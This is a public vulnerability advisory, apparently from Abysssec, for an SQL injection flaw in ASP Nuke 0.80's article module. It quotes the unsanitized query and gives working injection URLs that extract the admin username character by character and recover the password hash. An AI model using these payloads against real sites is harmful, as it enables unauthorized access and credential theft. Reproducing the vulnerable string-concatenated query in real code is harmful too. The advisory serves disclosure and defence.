''' ________ __ ____ |\/|/ __ \ /\| || |_ \ | \/ | || | /\ | || | |_) | | |\/| | || |/ /\ \| || |_ < | || | |__| / ____ \ |__| | |_) | |_||_|\____/_/\_\____/|____/ http://www.exploit-db.com/moaub11-asp-nuke-sql-injection-vulnerability/ ''' Abysssec Inc Public Advisory Title: ASP Nuke SQL Injection Vulnerability Affected Version: AspNuke 0.80 Discovery: www.abysssec.com Vendor: http://www.aspnuke.com Download Links: http://sourceforge.net/projects/aspnukecms/ Description: =========================================================================================== 1)- SQL Injection This version of ASP Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Vulnerable code in .../module/article/article/article.asp: Ln 37: sStat = "SELECT art.ArticleID, art.Title, art.ArticleBody, " &_ " auth.FirstName, auth.LastName, " &_ " cat.CategoryName, art.CommentCount, " &_ " art.Created " &_ "FROM tblArticle art " &_ "INNER JOIN tblArticleAuthor auth ON art.AuthorID = auth.AuthorID " &_ "INNER JOIN tblArticleToCategory atc ON atc.ArticleID = art.ArticleID " &_ "INNER JOIN tblArticleCategory cat ON atc.CategoryID = cat.CategoryID " &_ "WHERE art.ArticleID = " & steForm("articleid") & " " &_ "AND art.Active <> 0 " &_ "AND art.Archive = 0" The value of steForm("articleid") is concatenated directly into the WHERE clause with no quoting, type check or parameterization, so any request-supplied string becomes part of the SQL statement. Considering the code, you can browse these URLs: http://www.site.com/module/article/article/article.asp?articleid=7' (the failed query will be shown) http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'='a'-- (this query is always true) With the following URL you can find the first character of the Username: http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,1,1)+from+tblUser)-- and the second character: http://www.site.com/module/article/article/article.asp?articleid=7+and+'a'=(select+SUBSTRING(Username,2,1)+from+tblUser)-- and so on.
In this way the admin account's information can be recovered: Username: admin Password: (sha256 hash) The password is stored as a SHA-256 hash (hashed, not encrypted) computed by the .../lib/sha256.asp file. ===========================================================================================